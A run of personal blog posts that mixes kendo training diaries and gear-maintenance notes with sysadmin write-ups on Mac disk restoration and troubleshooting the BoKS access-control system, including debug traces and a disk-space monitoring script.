At the end of class there was one small extra that made me feel better though! Ton-sensei asked me how I thought I was doing, to which I replied that I'm not going to be proud of myself as my stamina is horrible and because I'm still making the same mistakes I was in my first month of kendo a year ago. Sensei indicated that he was actually quite pleased with my progress in bogu. For someone on his third week in armor I was apparently adjusting quite well. Nice to hear :)

Speaking of working towards a new level: I've volunteered to teach Aaron-sempai how to do shinai maintenance. At roughly eleven years old he may be my junior by a factor of two, but at kendo he is my senior. He's been doing it longer than I have and I can honestly say that I admire him for the potential he shows! He's got good fighting spirit; right now it's just his age that gets in his way. By teaching him the basics of maintenance I hope to help him along just a little bit. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Maintenance: iPhoto, HFS+ and AFP

2012-01-29 10:17:00

Laptops and drives

Over the past week Marli's Macbook had been performing worse than usual. Time Machine kept on hanging, Spotlight kept on using 100% CPU on one core and Safari and iPhoto were very slow. What with TM and SL being hard drive intensive software I reckoned I'd better check out the hard drive using Disk Utility (which does an fsck). Bingo: plenty of problems detected! To a point where DU informed me I needed to boot from another drive, because the laptop's drive was too broken. :(

Booting from the recovery partition using CMD-R quickly gave me access to DU again, which after a while of running puked the following error: "Disk Utility can't repair this disk. Back up as many of your files as possible, reformat the disk, and restore your backed-up files.". Basically it's telling me to grab what you can and run to the hills! Oy vey! 

Luckily we regularly make full hard drive images of our laptops, using asr (Apple Software Restore, the command line counterpart to Disk Utility's restore function). Booting from Marli's drive image was a cinch, as was making an extra copy of her home directory from the laptop. Sure, Time Machine makes hourly backups, but it never hurts to have an extra copy! The course of action was:

Making the extra backup took the most time: Marli's 42GB ballooned into 120GB because the "cp -rp" turned symlinks into actual files, so it took four hours in all! The restoration was a snap: 1.5 hours for the drive image, 2 hours for the OS upgrade and software updates, 1 hour for the homedir restore. And most of that time was spent waiting, not actually doing anything. 
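
For reference, restoring one of those asr images boils down to something like the following. This is a minimal sketch from memory, with purely hypothetical volume and image names, so double-check the target device before running anything like it:

sudo hdiutil create -srcdevice /dev/disk0s2 /Volumes/Backup/macbook.dmg    # make the image
sudo asr imagescan --source /Volumes/Backup/macbook.dmg                    # checksum it so asr will accept it as a restore source
sudo asr restore --source /Volumes/Backup/macbook.dmg --target /dev/disk0s2 --erase    # wipe the target and restore the image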

While waiting for Marli's laptop to do its thing I took it upon myself to give our NAS a once-over as well. The file systems had some minor problems which were fixed easily. I then performed maintenance on the iPhoto database using the built-in tools and by doing a sqlite vacuum. That made a huge difference! Finally, because our iPhoto library resides on an AFP share on our NAS, I tweaked the AFP kernel settings on both our laptops. 
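
The vacuum itself is nothing fancy. Assuming the sqlite3 command line tool is available and guessing at the database filename inside the iPhoto library package (the exact .db names differ per iPhoto version), it's roughly:

cd ~/Pictures/iPhoto\ Library           # or wherever the library lives, e.g. the AFP share
cp iPhotoMain.db iPhotoMain.db.bak      # safety copy first
sqlite3 iPhotoMain.db 'VACUUM;'         # rebuild the database file and reclaim free pages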


kilala.nl tags: , ,

View or add comments (curr. 0)

Second day of getting hit: still liking it!

2012-01-21 22:04:00

I don't know why, but today's class drew a rather small group! Ton-sensei and Kris-fukushou led the training. Hugo and two newbies were doing basics and there were six of us in full armor: Tiamat, Aaron, Sander, Houdaifa, Charl and me. I guess we owe it to the smaller group that our rhythm was a bit different from usual.

0900-0930 was filled with kata as usual. Warming up included the stretching and the usual suburi, but then we switched to pairs to do contact haya-suburi. No running or footwork this time, we immediately got into armor. We practiced kirikaeshi, men-uchi and kote-men as a group and then split up. Don't know what the armor-less folks were doing, but Kris took us through many interesting techniques, including suriage waza (parry on kote, then hit men) and maki waza (spiral the opponent's shinai to open a strike).

For fun and learning, the kendoka in bogu then all lined up for shiai with Charl (our only 1-dan student) who beat every single one of them. Class was then closed with uchikomi geiko, where all students had passes at Ton-sensei, Kris and Charl. During our debriefing Kris did impress upon us that he wasn't very pleased with the progress we're making... or actually, the lack thereof. All of us really need to step up to the challenge and push ourselves harder if we want to reach the next level as a group!

Notable flaws in my work today:

In closing, let me just say that I enjoy the hell out of participating in full! I'm so glad that I finally get to do real fights! I'm so grateful to Martijn, for lending me his helmet! _/-o_


kilala.nl tags: , ,

View or add comments (curr. 3)

iTunes Match: what could possibly go wrong?

2012-01-21 21:54:00

I was pretty happy when I got my hands on iTunes Match. Still am, by the way. But Marli? Not so much! You see, when at least one of the people using the account actually cares about things like play counts and star ratings, you need to think carefully about how you switch to Match. Case in point: the rather pissed off voice mail left during kendo practice this morning ^_^;

What'd happened? Thursday I'd immediately set my Mac to syncing with iCloud and yesterday morning it was done. It all worked swimmingly and I was playing music from the cloud all day at the office. Great stuff! So in the afternoon I told Marli to enable it on her Macbook as well. Clickety-click and you're done. Until this morning, when she was rather unpleasantly surprised to find that all of her playlists and her meticulously kept database had been fscked up. Because my Macbook was the first to sync, iCloud assumed that it was also -my- ratings and play counts that mattered most. She had also gone from a library listing of ~3300 songs to ~9000 songs. And she really doesn't want to see all my music :D 

So! Here are my tips for sharing an iTunes Match account between two people, assuming that one of them (like me) does not care about play counts and star ratings. 

  1. On the iTunes library of the person who does NOT care: reset all play counts and star ratings.
  2. On the iTunes library of the person who DOES care: make a backup of 'iTunes Library.itl' and then enable iTunes Match. Finish the whole syncing process.
  3. On the iTunes library of the person who DOES care: change all the smart playlists to include the extra rule "Location is on this computer".
  4. On the iTunes library of the person who DOES care: create a smart playlist which is "Location is on this computer" and "Media kind is music". This will act as the new, local library for this person.
  5. Finally enable iTunes Match on the other person's computer. He'll now get a bunch of ratings from the other user, but won't care ;)

The main library of the caring user will still show -all- of the music in iCloud, but at least the ratings and such will be retained.


kilala.nl tags: , ,

View or add comments (curr. 2)

Renshinjuku Almere sports clothing

2012-01-19 17:58:00

shirt, shirt, polo, sweater, jacket

I love putting design on clothes in vinyl or print. I've made festival shirts for us all, anime/japan shirts for my sister and Arrow Emblem clothing for myself. Recently I asked permission from Heeren-sensei, the founder of Renshinjuku kendo dojo, to use the Renshinjuku logo on some sports gear. I am very grateful that he allows me to do so. 

The group of people at our Almere dojo has been very welcoming and friendly to newbies. They're very supportive and I'm very proud to have become part of this team! I'd love to have a sweater or jacket with our dojo logo on it, to wear when I'm out running. That way I'll be reminded of my classmates and their support. I'll remember exactly why I'm trying to build more stamina :)

The picture above shows a few mockups I've put together at SpreadShirt.nl. I've always been very pleased with the quality of their work; their vinyl prints are very sharp!

EDIT:

Right, already I'm on the second revision. Dropped the big surname off the shirt and am just using Almere on it. The jacket and sweater will still have a surname on it (so I don't "lose" it), but much smaller on the front. Here is v1.


kilala.nl tags: , ,

View or add comments (curr. 0)

First time training in full bogu. What a great day!

2012-01-14 14:06:00

The day got off to a slow start. I was achy and dull and slow and had trouble waking up. First thing I did was to take my shaving gear downstairs to make myself look presentable for kendo practice. That's one of the many things I've learned about kendo: make sure that you are clean, look neat and that you have your stuff together. It's one of the many psychological aspects of the sport. It's a reassurance to yourself and it also signals to your classmates and opponents that you are ready and that you take things seriously. 

A trim and a shave later I double checked my bags and got our kid downstairs for breakfast. As expected, Martijn showed up at 0830 after which we piled into my Honda and drove to the dojo. We were running a little bit late. Class started as usual: get dressed, get your gear setup in the dojo and then warm up and practice kata. Martijn and I went through kata 1 through 4 twice and I got a rather important pointer from Raoul-sempai: my judgement of the maai is completely off! Martijn doesn't even have to step back in kata 1 in order to avoid my strike. I need to be more confident and closer. 

Warming up was the usual: stretching, suburi and footwork training. Extra attention was paid to the fumikomi aspect, which is my goal for 2012. With regards to fumikomi I'm doing plenty of things wrong!

The last point was also noticed during jigeiko, where Ton-sensei kept shoving me in my back after I struck him. Basically: "why the heck are you slowing down, while you should be speeding up?!" He's right of course ^_^

After warming up we all got geared up. I wasn't the slowest (huzzah!) but I did need to redo my men at least once afterwards. The chin pad I was wearing kept the men from sitting right, so I'll replace that with the pillow I made. The better part of the hour was spent on waza practice: debana-men, men/suriage-men, men/suriage-kote, kote/do, men/hiki-men. I might've forgotten some, or gotten names wrong though :D Maybe Hillen or Kris can name them all again. 

And the jigeiko! Because I was redoing my men I came late to the party and four pairs had already formed. So when Martijn bowed out I quickly grabbed the chance to 'dance' with Yann. Yann was then asked to spar by Ton-sensei, but I followed quickly thereafter. And then class was already over! We officially closed the session in our traditional sense, after which Kris, Martijn, Charl and I quickly donned our men again! In preparation for the february 19th kyu tournament, Kris quickly walked me through the basics and etiquette of shiai. And finally ten minutes of jigeiko, which were interspersed with helpful comments and analysis. He was going easy on me ;)

Because I was late in going home I got dressed as quickly as I could. Mercifully my hakama cooperated perfectly when I folded it! :D Back home all my sweat-drenched gear (it's never been this wet before!) was dispatched to the laundry and my bogu was set out to air-dry. Speaking of "back home": my family had gone out to Bij Honing for sandwiches! Filet Americain and salmon salad make a great lunch! :9

To finish it all off, simply because we could, all three of us took a bath together. So now we're all relaxed, comfortable and squeaky clean! I'll probably do a little bit of cleaning around the house this afternoon, take a short nap and fiddle around with Shadow Era.

What a great day!

EDIT:
Something else important that Kris taught me during our private jigeiko: "Don't let them see that you're tired". Sure, you're tired! But mask it by changing your pace. I'm not eighteen anymore and I can't go head to head using my younger opponents' styles. I can only keep up a flurry of blows for so long, so I'll need to be smart about it. When do I unleash a torrent of strikes? And when do I bide my time, using other techniques?

EDIT 2:
The Sankei kendo glasses worked a treat by the way! They steamed up a little bit later on during class, but once I got moving again that was quickly resolved. At the start of class they were uncomfortably tight, but after getting really into the swing of things I didn't even notice anymore. The pressure of the men himo on my temples was worse, as was the sting of the strikes to my head ^_^


kilala.nl tags: , , ,

View or add comments (curr. 2)

I'm competing! Borrowed a men!

2012-01-09 21:31:00

Me wearing a borrowed men

o WOOHOO! /o/

Last saturday we discovered that the uchiwa in my borrowed men from Ton-sensei wasn't wearable with my glasses. Dispiriting and all. But then Martijn made me an awesome offer! He's willing to lend me -his- brand new men, so I can practice in the dojo and even take part in the dutch kyu tournaments in february!

FSCK YEAH! 

Domo arigatou Martijn!


kilala.nl tags: , , ,

View or add comments (curr. 4)

Kendo: new year's goals

2012-01-07 14:25:00

Learning kata 4

Today was the first class of 2012. It wasn't very busy, but it was a nice class nonetheless! We even had two newbies. Martijn also taught me the basics of kata number 4 (picture above), which really is a pretty cool one!

Sensei and fukushou asked us to pick one or two goals for this new year, which we were to attain by the end of the year. I picked fumikomi: by the end of 2012 I want to be able to pull off decent and consistent fumikomi.

Learning points from today's class:

Marli came to class to take photographs; that was great :) She was originally invited to make our 2012 groupshot, but then also stayed to shoot during the rest of class.


kilala.nl tags: , ,

View or add comments (curr. 2)

Feeling extremely frustrated

2012-01-06 21:10:00

*sigh* I'm feeling very, very awkward. I'm conflicted, I'm annoyed, I'm pissed off and I just don't know what to do. 

My eyesight is awful, that's no secret. I am also a complete pansy, that's no secret either. I cannot force myself to wear contacts, so it's just glasses for me. Sadly, the kendo glasses I ordered recently just don't seem to be working with the standard helmets I've encountered so far. Meaning that for the first time in my life my eyesight is going to prevent me from doing something I love: without good eyesight and without proper protection I'll never be able to take part in kendo.

This has made me rethink churgery. (EDIT: "churgery"?! Really! I must've been out of it yesterday!)

Laser correction however is not performed under general anaesthesia, meaning that it's not going to happen. If I can't put contacts in or even touch my own eyeball, then no way in hell is anybody going to put clamps on my eyeball and prod my eyes. No. I need to be out cold. Which leaves us with lens implants. Sounds good to me.

Only, it'll cost roughly 2000 euros per eyeball. And it requires that my eyes are stable, which they aren't. So I'm probably not a viable patient and it'll cost us quite some money out of our own pockets. 

So many unanswered questions. So few options. But I do know this: I really, really want better eyes. And I really, really want to do kendo. I'll need to have a chat with my GP so she can refer me to an optometrist or eye doctor for a good talk. 

Honestly. If there ever was anything I could magically change about my body, it'd be my eyesight. Muscles I can take care of myself and I don't care about the stereotypical male "Oooh, I wish I could change that!". My eyes. Come on, magic genie! Come on, Celestia!

In the mean time I'll just keep on looking for a way to fit glasses inside my kendo helmet. That's gonna cost a penny too :|

EDIT:

It might be "wrong" thinking, a broken thought process perhaps, but I feel it's ironic, dispiriting and humbling that I'm letting myself be stopped from practicing a martial art that is as much about spirit and mental force as it is about physical strength, simply because "I can't do something". To the point that I feel unworthy even trying to be part of it. If I can't overcome my own fears and reflexes over touching my eyeballs, how the heck am I going to overcome my adversaries?! 

Plenty of people have assured me that "it's easy to learn" and "you'll definitely get used to it". But then the frustrated voice in me yells, "Really?! Really? How are you going to teach an adult to overcome a reflex that was burned into his mind twenty years ago? The same adult who gets violent towards anybody going near his eyes?". It's not about getting me to physically touch my eye, it's about overcoming childhood traumas that have become deeply ingrained. 

Maybe I have it the wrong way around. Maybe years of kendo will help me overcome this crap. Maybe I'll be able to try contacts in a few years -because- of kendo. And to think that I was this --> <-- close to saying "I'm not worthy of studying kendo".


kilala.nl tags: , , , , ,

View or add comments (curr. 12)

Kendo equipment maintenance

2012-01-03 07:15:00

tare zekken kote and a men pad

As I wrote a few days ago we have been using the year's end downtime at the dojo for maintenance of our equipment.

On the 30th Martijn came to visit, to theorize about our practice dummy and to check his shinai. He also was kind enough to put new lacing in my kote. Both tasks were easily done using the wonderful and free kendo equipment manual PDF. That book has taught me so much! That same evening I put a new belt on the tare and started thinking about sewing a zekken.

Which is exactly what I did! Employing a rather crude split stitch I embroidered my name and our dojo's name, as per the standard for zekken. Let me tell you, a thirty-something guy doing embroidery on the train draws some weird looks ;) Now, the result might not be beautiful, but I'm happy nonetheless. And once my 'real' zekken comes in from kendo24 I can still use this one as a small bag to keep my valuables in at the dojo.

Finally I put together a simple pillow to put inside the men I borrowed from Loyer-sensei. It's a bit too big for me and the pillow provides enough padding to keep it in place. That's fifteen euros saved right there!

I really enjoy how kendo (a very active and aggressive sport) has led me to so many calming and relaxing manual activities! I get a lot of fulfilment from knowing that I can properly honor my equipment by providing it with the required maintenance myself. Some people might swing a shinai like a broomstick or stuff their hakama into a gym bag, but to me those things are more than simply tools. And by letting kendo engage my creative side it's become a bigger part of my life.

Now if only I could learn to apply the psychological and mental lessons in real life as well! ;)


kilala.nl tags: , ,

View or add comments (curr. 3)

Preparing for the next step in kendo

2011-12-29 19:36:00

The design for my zekken

In the new year things will get serious!

My kendo glasses are being made, so I can start wearing my men. That completes my bogu, as I've already been wearing the do, kote and tare. Which means that yes, I'm going to get into real geiko and I can compete in shiai! And as I have mentioned before I'll jump into the deep end in 2012! January will see our next kyu examinations and in February I'll join the kyu-grade tournament.

This will require a few last preparations:

The design for my zekken is shown on the left. Along the top is the name of our dojo, Renshinjuku (錬心塾) and along the bottom is my surname. The middle is a repeat of my surname, but in katakana, which reads SURATA. The fine folk at kendo24 are on holiday this week and my favored shinai (the "kenshi" model) is sold out, so I hope my order will reach Almere in time. 


kilala.nl tags: , ,

View or add comments (curr. 5)

New (kendo) glasses ordered

2011-12-24 11:26:00

kendo glasses

This morning I walked into the local SpecSavers to get measured for new glasses. My current glasses have never really worked out properly for me, so I'm replacing them within two years instead of the usual three. I have to say that today's measurement was worrisome for me. I'll soon make an appointment with an optometrist, because I wonder if there's something rather wrong with my eyes. Time to get over my fear of eye doctors :(

Left: Sp = -10.25, was -9.50 in december 2009 and -9.00 in december 2006.

Right: Sp = -10.25, was -9.75 in december 2009 and -9.50 in december 2006.

Today I ordered lenses for my kendo glasses, which have priority as my first tournament is up in february. In January I'll go back to the shop with Marli, so we can pick out frames for new day-to-day pairs. At least the price is right at SpecSavers! I'm getting lenses with an RI of 1.6 and they come at 95 euro for the pair. Not apiece, but for the pair! SpecSavers will charge me 50 bob to cut them and install them in my frame. That's -still- half of what we used to pay at Pearl! 

Kris, if you're reading this: with some luck you'll get to really knock me around, come January! ^_^


kilala.nl tags: , , , ,

View or add comments (curr. 3)

BOKS: Mind your log files, part 2

2011-12-19 00:00:00

A few months back we discussed how incorrect log settings can mess with your auditing and logging in "Mind your log files!". Today we'll take a look at another way your logging can go horribly wrong.

Case in point: keystroke logs.

BoKS' suexec facility comes with optional keystroke logging, which allows you to capture a user's input and output. This is particularly handy when providing suexec su - user access to an applicative or super user. These keystroke logs are stored locally on the client system, where they are hashed and filed. The master server will then pull these log files from each client for centralized storage, after which the files will be cleaned from the clients. Optionally, these log files will then be pushed to replica servers for backup purposes.

Things go awfully wrong when the master server's kslog storage is underdimensioned. Once the storage location for keystroke logs is filled, the master server will stop pulling and cleaning files from client systems. This means that $BOKS_var/kslog, which is meant for temporary storage, now becomes rather permanent storage. And since many BoKS administrators leave $BOKS_var as part of the /var file system you are now filling up /var. If the BoKS client system is not protected against a 100% filled /var you are now looking at a very, very nasty situation. You might end up crashing client systems, or causing other erratic behaviour.
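
A simple way to avoid getting bitten is to watch the kslog file system (on the master and on clients) before it fills up. Below is a minimal sketch of such a watchdog; the /var/opt/boksm path and the 80% threshold are assumptions for this example, so adjust them to your own environment:

#!/bin/sh
# Hypothetical kslog watchdog - the path and threshold are site-specific assumptions.
KSLOG_DIR="/var/opt/boksm/kslog"
USED=$(df -P "$KSLOG_DIR" | awk 'NR==2 { sub("%","",$5); print $5 }')
if [ "$USED" -ge 80 ]; then
    echo "WARNING: file system holding $KSLOG_DIR is at ${USED}% - keystroke log pulls may stall" | mailx -s "BoKS kslog space" root
fi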

TLDR:


kilala.nl tags: , ,

View or add comments (curr. 0)

Closing 2011 at Renshinjuku Kendo Almere

2011-12-17 19:09:00

Today was the closing of 2011 at Renshinjuku Kendo in Almere (錬心塾剣道 アルメレ). And for this occasion our trainers had set up an interesting day :)

The suburi for warming up were changed dramatically. After the usual joge-buri, a new "game" was explained to us. Every member of the school would sound off ten strikes in turn and everybody would chime in with a shout of "men!". Since there were fifteen people, that makes for a hundred and fifty strikes. Did I mention it was haya suburi?! (short video of haya suburi) I failed right after my turn, which was after fifty I believe ;_;

I did my best to have great kiai and was one of the few whose counting resounded loudly through the hall ^_^

After that was another fun little game: everybody would take turns hitting fast kote on motodachi for ten seconds straight. The challenge was to land as many good strikes as possible, combining fumikomi, kiai and strike. I managed to get up to 32, although that could've been more had I paid more attention to footwork and relaxation. 

After that: kiri kaeshi (another short video), which didn't go too well at all. The kendoka without full bogu were taken aside by Kris to focus on the basics: footwork and strikes. We were all quite sloppy :( Then, more and more basics, including stuff to focus on reaction times and snappiness. It was a great last class for the year and I felt awesome in the end. 

Today's big learning points!

I'm very much looking forward to 2012. In january we will have our next exams and in february I plan on taking part in the kyu-grade tournament with Martijn. That means I'd better get a move on with my kendo glasses as I'll need to be in full bogu for the tourney!


kilala.nl tags: , ,

View or add comments (curr. 2)

BoKS debugging example

2011-12-16 00:00:00

 

Yesterday served as a reminder that we can all fall prey to stupid little things :)

Symptom: A customer of mine could use suexec su - oracle on a few of his systems, but not on some of his others.

Troubleshooting: Everything seemed to check out just fine. The customer's account was in working order and neither root, nor the target account were locked or otherwise problematic. And of course the customer had the required access routes.

$ suexec lsbks -aTl *:customer | grep SXSHELL
suexec:*->root@HOSTGROUP%CUSTOMER-PG-SXSHELL (kslog=3)

$ suexec pgrpadmin -l -g CUSTOMER-PG-SXSHELL | grep oracle
/bin/su - oracle
/usr/bin/su - oracle

So, why does BoKS keep saying that this user isn't allowed to use suexec su - oracle on one box, but it's okay on the other?

12/13/11 10:00:57 HOST1 pts/1 customer suexec Successful suexec (pid 16867) from customer to root, program /bin/su
12/13/11 10:00:57 HOST1 pts/1 customer suexec suexec args (pid 16867): - oracle
12/13/11 10:01:12 HOST2 pts/5 customer suexec Unsuccessful suexec from customer to root, program /bin/su. No terminal authorization granted.

I thought it was odd that the logging for the failed suexec seemed "incomplete", but wrote it off as a software glitch. However, this is where alarm bells should've gone off!

So I continued and everything seemed to check out: on both hosts /bin/su was used, on both hosts oracle was the target user and the BoKS logging supported it all. So let's try something exciting! Boksauth simulations!

Obviously the simulation for HOST1 went perfectly. But then I tried it for HOST2:

$ suexec boksauth -L -Oresults -r 'SUEXEC:customer@pts/1->root@HOST2%/bin/su#20-#20oracle' -c FUNC=auth TOUSER=root FROMUSER=customer TOHOST=HOST2 FROMHOST=HOST2 PSW="iascfavvcfHc"

ROUTE=SUEXEC:customer@pts/1->root@HOST2%/bin/su#20-#20oracle
FUNC=auth
TOUSER=root
FROMUSER=customer
TOHOST=HOST2
FROMHOST=HOST2
PSW=iascfavvcfHc
$HOSTSYM=MASTER
$ADDR=192.168.10.20
$SERVCADDR=192.168.10.20
WC=#$*-./?_
FKEY=CUSTOMER-HG:customer
UKEY=HOST2:root
RMATCH=suexec:*->root@CUSTOMER-HG%CUSTOMER-PG-SXSHELL,kslog=3
MOD_CONV=1
AMETHOD=psw
$PSW=ok
VTYPE=psw
RETRY=0
MODLIST=kslog=3,prompt=+1,su=+1,passroot=+1,use_frompsw=+1,su_fromtoken=+1,chpsw=-1,concur_limit=-1
$STATE=9
$SERVCVER=6.5.3

What I was expecting to see was STATE=6 and ERROR=203. But since the ERROR= field is absent and the STATE=9, this indicates that the simulation was successful. Now things get interesting! So I asked my customer to try the suexec su - oracle with me online, while I ran a trace on the BoKS internals. This resulted in a file 10k lines long, but it finally got me what I needed.

In the course of the debug trace, BoKS went through table 37 (suexec program group entries) to verify whether my customer's command was among the entries. It of course was, but BoKS said it didn't match!

wildprogargscmp_recurse: wild = /usr/bin/su#20-#20oracle, match = /bin/su^M
wildprogargscmp_recurse: is_winprog = 0^M
wildprogargscmp_docmp: Called, wild /usr/bin/su#20-#20oracle match /bin/su^M
wildprogargscmp_docmp: Progs do not match^M
wildprogargscmp_docmp: return 1 (0 means match)^M
wildprogargscmp_recurse: wild = /bin/su#20-#20oracle, match = /bin/su^M
wildprogargscmp_recurse: is_winprog = 0^M
wildprogargscmp_docmp: Called, wild /bin/su#20-#20oracle match /bin/su^M
wildprogargscmp_docmp: fnamtch wild - sumdev, match did not match^M
wildprogargscmp_docmp: return 1 (0 means match)^M

This threw me for a loop. So I went back to the original BoKS servc call that was received from client HOST2.

servc_func_1: From client (HOST2) {FUNC=auth01TOHOST=?HOST01FROMHOST=?HOST01TOUSER=root01FROMUSER=customer01FROMUID=181801FROMTTY=pts/5201ROUTE=SUEXEC:customer@pts/52->root@?HOST%/bin/su}^M

And then it clicked! One final check confirmed that I'd been overthinking the issue!

$ suexec cadm -l -f ENV -h HOST2 | grep ^VERSION
VERSION=6.0

It turns out that HOST2 was still running BoKS version 6.0. While the suexec facility was introduced into BoKS aeons ago, only as of version 6.5 did suexec become capable of screening command parameters! So a v6.5 system would submit the request as suexec su - oracle, while a v6.0 host would send it as suexec su. And of course that fails.

It's awesomely fun to dig around BoKS' internals, but in this particular case it'd have been better if I'd spent the hour on something else :)

 


kilala.nl tags: , ,

View or add comments (curr. 0)

Sports, kendo, perseverance and such

2011-12-03 20:52:00

The past few weeks I have been a bit frustrated with myself. Since coming home from Japan I haven't properly gotten back to my sports regime. Only last week did I try to get back to running on a daily basis, which aggravates me because I walk the same piece of road every day anyway. So why not run instead of walking?! Well, at least I'm not taking the bus to the office.

Same for kendo. Before the holiday I used to train at home at least once a week, together with Martijn. Of course, these days the weather outside is awful, but I can still train by myself in the attic like I did when I just got started. But I haven't...

But! I'm not quitting kendo! I enjoy this way too much and it's very educational, both physically and mentally. The social aspect of it is also very pleasant, as my classmates are cool guys.

Points to take away from today's lesson:

 


kilala.nl tags: , , ,

View or add comments (curr. 5)

BOKS: Demystifying the user FLAGS field

2011-11-28 00:00:00

 

The BoKS database can be an interesting place to poke around, "mysterious" at times. For example, there's the enigmatic "FLAGS" field which resides in table 1, the user data table. Among the usual user information (name, host group, user class, password, GID, UID, etc) there's the "FLAGS" field which contains a numerical value. What this numerical value represents isn't clear to the untrained eye.

The "FLAGS" number is a decimal representation of a hexadecimal number, where each digit represents a number of flags. The value of each digit is determined by adding the values of the flags enabled for the user. You could compare it to Unix file permission values, like 750 or 644, there each digit is an addition of values 1, 2 and 4 (x, w and r).

Below you'll find a table of the flags that can be set for any given user account.

Flag                           MSD  2nd  3rd  LSD
User deleted                    -    -    -    1
User blocked                    -    -    -    2
Timeout not depend on CPU       -    -    2    -
Timeout not depend on tty       -    -    4    -
Timeout not depend on screen    -    -    8    -
Windows local host account      -    1    -    -
Windows domain account          -    2    -    -
Lock at timeout, no logout      1    -    -    -
User must change password       2    -    -    -
Manage secondary groups         4    -    -    -
Check local udata               8    -    -    -
Max. value                      F    3    E    3

So for example, a value of 16386 equals a value of 0x4002, which means that the user is blocked and that BoKS is used to push his secondary group settings to the /etc/group file on each server.
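If you don't feel like doing the conversion in your head, printf from any shell will do it for you, after which you can read the digits off against the table above:

$ printf '0x%04X\n' 16386
0x4002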


kilala.nl tags: , ,

View or add comments (curr. 0)

Kendo omamori: charms for success and fighting spirit

2011-11-13 13:14:00

Omamori from Nara for success in sports

As I wrote before I bought a number of omamori when we were in Japan: amulets purchased at temples, for various purposes. For example: the one I bought for Marli is for a happy marriage, but there are plenty of other kinds. Good luck, aid in studies, good health, and plenty, plenty more. 

For my dojo's sensei and trainers I bought charms from the Hakozaki shrine, dedicated to Hachiman (a god of war and harvest). The ones I bought were for success in sports, and seeing how Hachiman is the protector of warriors I reckoned that was appropriate for kendoka and kenshi. It gladdens me that my teachers were happy with the token of appreciation and at least two of them now wear their omamori on the inside of their do.

Now it's time to delve a little into the one I bought for myself. Bought at the Todaiji temple in Nara, its origin is a bit of a contrast with my teachers' amulets. Hakozaki's shrine is shintoistic and dedicated to a god of war, while Todaiji is a buddhist temple; we all know the buddhists' take on violence. 

The creature, or person, depicted on my omamori is Misshaku Kongō (密迹金剛), also called Agyō (阿形), one of the two Nio: wrathful and strong guardians of the Buddha. To quote Wikipedia:

"They are manifestations of the Bodhisattva Vajrapāṇi protector deity and are part of the Mahayana pantheon. According to Japanese tradition, they travelled with the historical Buddha to protect him. Within the generally pacifist traditions of Buddhism, stories of Niō guardians like Kongōrikishi justified the use of physical force to protect cherished values and beliefs against evil."

Agyō is a symbol of overt violence, as opposed to Ungyō, who symbolizes latent strength. I reckon both make great deities for a bit of backup in kendo ^_^

Funnily enough, Flickr user GreenTea has the exact same omamori on his (or her?) do. The fine people at Miyako Kendogu also sell an omamori specifically for success in kendo; however, Andy Fisher later told me this is not actually a blessed amulet, but "rather they are more of a novelty/souvenir type omamori". Of course the best places to buy omamori for budo sports are the Katori and Kashima shrines, the origin of budo. Those shrines were out of our way though, being east of Tokyo.

Interestingly I've learned that Amsterdam is home to Europe's only shinto shrine: Guji Holland Yamakage Shinto Shrine. At least there's a place close to home where we can safely (or at least in a traditional fashion) dispose of the omamori once they have served their purpose. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Head cold? Screw it and let's fight!

2011-11-12 15:22:00

Thomas in his helmet

I've had a head cold all week, but decided to go to kendo practice anyway. I've been missing waaaaay too many classes, between our holiday and last week's absence. Aside from my kiai lacking severely (slimy vocal cords) it was a very educational class. 

Warmup was different, with a few less stretches than normal and no footwork or running at all. On the other hand, before that the group did longer kata practice than usual. We immediately went into kihon, doing kirikaeshi, various men strikes and kote-men sequences. After that the groups were split between bogu wearing folks and those without armor. My smaller group practiced maki waza (where you gain center by spinning your opponent's shinai in a loop) and hiki-men (where one strikes men on a backwards lunge).

Lessons to take away from today's class:

Class was finished with kakari geiko and uchikomi geiko: basically, each of us gets to attack the teacher as often and as fast as possible for X amount of time. 

Sadly I can't partake in tomorrow's "central training" where a few dozen kendoka from all over the Netherlands gather. Full armour is a requirement, so that's it for me. I hope to have my kendo glasses completed by january, so I can attend the next practice. Speaking of, you can see the glasses in the photograph.


kilala.nl tags: , ,

View or add comments (curr. 3)

BoKS: Successful login, but no logging

2011-11-04 00:00:00

 

Another fun one!

Case: Customer attempts to log in, succeeds, then gets kicked from the system immediately with a session disconnect from the server. The BoKS transaction log, however, does not show any record of the login attempt.

Symptoms:

Troubleshooting:

Debugging:

  1. Key exchange
  2. User identification
  3. User authentication
  4. Session startup

Trace shows failure when forking shell for customer.

debug2: User child is on pid 495766
debug3: mm_request_receive entering
Failed to set process credentials
boks_sshd@server[9] :369851 in debug_log_printit: called. Failed to set process credentials151212
boks_sshd@server[9] :370000 in debug_log_printit: not in cache, add
boks_sshd@server[9] :370092 in addlog: add Failed to set process credentials151212 (head = 0x0)
boks_sshd@server[9] :370233 in addlog: head = 0x20332b28

Cause:

After doing a quick Google search, we concluded that the customer's shell could not be forked due to a missing primary group on the server. Lo and behold! His primary group had not been pushed to the server by BoKS. This in turn was caused by corruption in AIX's local security files, which can be cleared up easily enough using usrck, pwdck and grpck.
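
For the record, clearing that up on AIX comes down to running the standard consistency checkers as root (shown here against all users and groups; review what they propose before letting them fix anything):

usrck -t ALL    # check user definitions
grpck -t ALL    # check group definitions
pwdck -t ALL    # check password/security stanzas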

This however does not explain why there was no transaction log entry for these logins, because by all means this was a successful BoKS login: authentication and authorization had both gone through completely.

Hypothesis and additional test:

We reckon that the BoKS log system call for the "successful login" message is only sent once a process has been forked, so on authentication+authorization+first fork, as opposed to on authentication+authorization as we would expect.

To test another case we switched a user's shell to a nonexistent one. When the user now logs in, this -does- generate the "successful login" message. This further muddles the question of exactly when the BoKS logging calls are made. FoxT is on the case and has confirmed the bug.

 


kilala.nl tags: , ,

View or add comments (curr. 0)

Back to kendo, finally!

2011-10-30 21:11:00

kendo glasses

Finally! After missing five weeks of kendo practice, or any other sport, I'm back! 

I really need to start running again, but putting that aside: yesterday was kendo class! And I was glad to be back! ^_^ As can be expected after more than a month without exercise it was tough going. My endurance was down, as were my muscle power and lung capacity. And as always my timing was off and I still suck at making the small strikes. 

My absence however has allowed me to become aware of something new, a flaw I hadn't noticed before. When moving forwards to make a strike I do not keep my upper body straight. I correctly move forward by pushing from my hips, but instead of keeping my shoulders above my center of gravity, I actually hollow my back. This messes up my form, my strike and my timing. I've always wondered why I suck so much at making good fumikomi: now I know. 

